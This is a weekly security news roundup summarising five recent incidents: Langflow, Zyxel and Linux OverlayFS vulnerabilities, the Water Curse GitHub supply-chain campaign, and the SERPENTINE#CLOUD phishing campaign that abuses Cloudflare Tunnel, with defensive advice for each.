Critical Cybersecurity Incidents This Week: From Langflow Vulnerabilities to New Cloudflare Threats

Today’s Top 5 highlights a critical vulnerability in Langflow, an old flaw affecting Zyxel network equipment, a privilege escalation vulnerability in Linux, an attack leveraging GitHub repositories, and a new malicious campaign using Cloudflare Tunnel subdomains.

1. **Critical Vulnerability in Langflow Leads to Flodrix Botnet Infection**

Trend Micro researchers discovered active exploitation of a severe vulnerability identified as CVE-2025-3248 (CVSS: 9.8) in Langflow, a widely-used platform for LLM frameworks. This vulnerability allows remote code execution without authentication via a specially crafted HTTP POST request sent to /predict. The attack deploys a script that launches the Flodrix botnet, which is capable of executing distributed denial-of-service (DDoS) attacks, gaining remote access, and installing cryptominers and infostealers. Versions prior to 1.3.0 are affected, and Trend Micro recommends updating to the latest version and restricting external access to the admin interface.

2. **Exploitation of an Old Vulnerability Targeting Zyxel Network Devices**

GreyNoise has reported a surge in attempts to exploit a vulnerability in Zyxel network devices. Identified as CVE-2023-28771 (CVSS: 9.8), this flaw was disclosed in 2023 and permits unauthorized attackers to execute certain operating system commands remotely by sending specially crafted packets to the targeted device. On June 16, 244 active traffic sources were logged within a 24-hour span, utilizing UDP port 500 to attempt sending malicious IKE packets. The attacks originated from various global locations, including major cloud hosting providers. Despite the relatively brief activity period, the scale and distribution indicate a well-organized campaign. It’s advised to update the Zyxel firmware to a version that addresses the vulnerability, limit external access to UDP/500, and monitor for suspicious IKE traffic.

3. **CISA Warns of Active Exploitation of Privilege Escalation Vulnerability in Linux**

The Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2023-0386 (CVSS: 7.8) to its Known Exploited Vulnerabilities (KEV) catalog, indicating that it is being actively exploited. This vulnerability affects the OverlayFS subsystem in the Linux kernel and allows local users to elevate their privileges to root due to improper ownership management. Ubuntu and Debian-compatible distributions are particularly vulnerable. It’s crucial to verify kernel versions and apply the available security updates immediately.

4. **Water Curse: GitHub Repository Attack Gains Traction**

Trend Micro experts reported that the Water Curse malicious campaign has compromised 76 GitHub accounts, using them to inject malicious code into popular open-source projects. The attack begins with the insertion of hidden malicious dependencies that execute multi-stage scripts and run harmful code on the machines of developers and DevOps engineers. The primary objective is to collect credentials and establish backdoors within corporate infrastructures. This malicious activity employs supply chain poisoning techniques and disguises itself as legitimate updates. It is advisable to enable two-factor authentication (2FA) for all GitHub developer accounts, isolate build environments, and implement release signing.

5. **New Malicious Campaign Uses Cloudflare Tunnel Subdomains for Malware Delivery**

Securonix researchers unveiled a complex campaign dubbed SERPENTINE#CLOUD, where attackers exploit Cloudflare Tunnel and WebDAV to mask command and control channels and deliver Remote Access Trojans (RAT). The attack initiates with mass phishing emails disguised as payment invoices. Embedded within these emails are files masquerading as documents, which activate a multi-step download process involving an in-memory Python loader. The attackers employ Living-off-the-Land techniques and covert routing through Cloudflare, enabling them to bypass security measures. This campaign primarily targets corporate Windows users and, according to the researchers, demonstrates a high level of resilience against detection. Securonix recommends monitoring tunnel traffic and auditing unusual Python interpreter invocations.